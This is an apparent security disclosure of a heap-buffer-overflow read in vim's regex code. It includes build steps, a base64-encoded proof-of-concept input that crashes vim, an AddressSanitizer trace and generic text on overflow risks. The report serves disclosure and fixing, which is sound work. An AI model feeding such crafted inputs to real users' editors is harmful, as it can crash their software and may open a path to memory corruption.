While testing vim built from commit ddfc051
with Ubuntu clang version 12.0.0-3ubuntu1~20.04.3 and Address Sanitizer, we discovered crafted input which triggers a heap-buffer-overflow, READ of size 1.
git clone https://github.com/vim/vim
LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
make
echo "Ywp2XTCqCi4KeQpAMA==" | base64 -d > fuzz000.txt
vim -u NONE -X -Z -e -s -S fuzz000.txt -c :qa!
cat fuzz000.txt | od -tx1
0000000 63 0a 76 5d 30 aa 0a 2e 0a 79 0a 40 30
0000015
The above POC produces this ASan stack trace:
==21690==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000012900 at pc 0x000000a5584c bp 0x7ffc54637da0 sp 0x7ffc54637d98
READ of size 1 at 0x621000012900 thread T0
#0 0xa5584b in utf_ptr2char /home/geeknik/vim/src/mbyte.c:1788:9
#1 0xdc82f5 in find_match_text /home/geeknik/vim/src/./regexp_nfa.c:5672:25
#2 0xdc82f5 in nfa_regexec_both /home/geeknik/vim/src/./regexp_nfa.c:7414:13
#3 0xea747e in vim_regexec_multi /home/geeknik/vim/src/regexp.c:2915:14
#4 0x7b1f7a in ex_global /home/geeknik/vim/src/ex_cmds.c:4964:14
#5 0x7f1aef in do_one_cmd /home/geeknik/vim/src/ex_docmd.c:2610:2
#6 0x7f1aef in do_cmdline /home/geeknik/vim/src/ex_docmd.c:999:17
#7 0x7e05d9 in ex_at /home/geeknik/vim/src/ex_docmd.c:7896:12
#8 0x7f1aef in do_one_cmd /home/geeknik/vim/src/ex_docmd.c:2610:2
#9 0x7f1aef in do_cmdline /home/geeknik/vim/src/ex_docmd.c:999:17
#10 0xf14dc0 in do_source /home/geeknik/vim/src/scriptfile.c:1406:5
#11 0xf22dd2 in cmd_source /home/geeknik/vim/src/scriptfile.c:971:14
#12 0xf22dd2 in ex_source /home/geeknik/vim/src/scriptfile.c:997:2
#13 0x7f1aef in do_one_cmd /home/geeknik/vim/src/ex_docmd.c:2610:2
#14 0x7f1aef in do_cmdline /home/geeknik/vim/src/ex_docmd.c:999:17
#15 0x150faa5 in do_cmdline_cmd /home/geeknik/vim/src/ex_docmd.c:593:12
#16 0x150faa5 in exe_commands /home/geeknik/vim/src/main.c:3081:2
#17 0x150faa5 in vim_main2 /home/geeknik/vim/src/main.c:773:2
#18 0x15082c9 in main /home/geeknik/vim/src/main.c:425:12
#19 0x7f36d03500b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#20 0x3c822d in _start (/home/geeknik/vim/src/vim+0x3c822d)
0x621000012900 is located 0 bytes to the right of 4096-byte region [0x621000011900,0x621000012900)
allocated by thread T0 here:
#0 0x44348d in malloc (/home/geeknik/vim/src/vim+0x44348d)
#1 0x477d9d in lalloc /home/geeknik/vim/src/alloc.c:244:11
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/geeknik/vim/src/mbyte.c:1788:9 in utf_ptr2char
Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop.
Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program’s implicit security policy. Besides important user data, heap-based overflows can be used to overwrite function pointers that may be living in memory, pointing it to the attacker’s code. Even in applications that do not explicitly use function pointers, the run-time will usually leave many in memory. For example, object methods in C++ are generally implemented using function pointers. Even in C programs, there is often a global offset table used by the underlying runtime.
When the consequence is arbitrary code execution, this can often be used to subvert any other security service.